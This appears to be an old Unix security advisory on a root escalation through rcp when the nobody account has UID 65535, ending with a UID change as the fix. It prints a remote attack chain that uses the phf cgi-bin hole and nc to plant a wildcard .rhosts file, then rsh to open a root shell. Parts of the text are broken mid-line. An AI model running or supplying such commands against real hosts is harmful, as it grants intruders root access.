

    Red  Hat  4.0  (if  user  nobody  has  UID 65535 and Slackware 3.1
    (possibly others)


    Root privileges can be obtained  by user nobody with uid  65535 by
    exploiting  a  problem  with  /usr/bin/rcp.  Many applications are
    running as 'nobody', in particular the NCSA httpd server, which by
    default executes all cgi-bin scripts under this uid.

    Exploit is kind of simple:

        root[11:20][504]~# su - nobody
        [nobody@slip-70-8 /]$ id
        uid=65535(nobody) gid=65535
        [nobody@slip-70-8 /]$ rcp /tmp/test
        [nobody@slip-70-8 /]$ ls -la /tmp/test
        -rw-------   1 root     65535           0 Jan 29 11:20 /tmp/test

    But then of course this is unrealistic, since regular users  don't
    usually  have  access  to  the  'nobody'  account. The password is
    usually disabled by '*',  the login directory is  /dev/null, etc..
    However some applications do run under uid 65535, and if they  can
    be made to execute rcp, root privileges can be obtained by anyone.

    For example NCSA httpd  server forks processes under  uid 'nobody'
    after  it  gets  executed  by  root,  so  any cgi-script which can
    execute rcp  can be  used to  gain root  access. In particular, do
    you  remember  the  old  problem  in  the phf cgi-bin script? If a
    newline character  is passed  to the  phf script,  it can  execute
    arbitrary programs as user 'nobody'.  So the problem with rcp  can
    be exploited remotely, and root access can be gained from outside,
    for instance like this:

        $ echo "+ +" > /tmp/my.rhosts
        $ echo "GET /cgi-bin/phf?
        /root/.rhosts" | nc -v - 20 80
        $ rsh -l root "/bin/sh -i"

    Description  for  this  and  exploit  is  Miro  Pikus  credit.  By
    looking  at  the  source  code  for  rcp,  Miro  noticed that that
    setuid() function  for user  65535 issues  -1 error  signal and so
    rcp, after opening  the ports as  root, fails to  setuid() back to

    NOTE for RedHat 4.0 admins:

    If you upgraded to RedHat  4.0 from some other older  distribution
    and kept the original /etc/passwd file, which common thing to  do,
    your UID for nobody is possibly  65535 and it is vulnerabile.   If
    you installed 4.0 from scratch  on an epmty hard drive,  you would
    have the default RedHat  /etc/passwd, which has user  nobody under
    uid 99.


    Change uid  of user  'nobody' to  something else  than 65535. '99'
    is used by default on RedHat 4.0 for instance.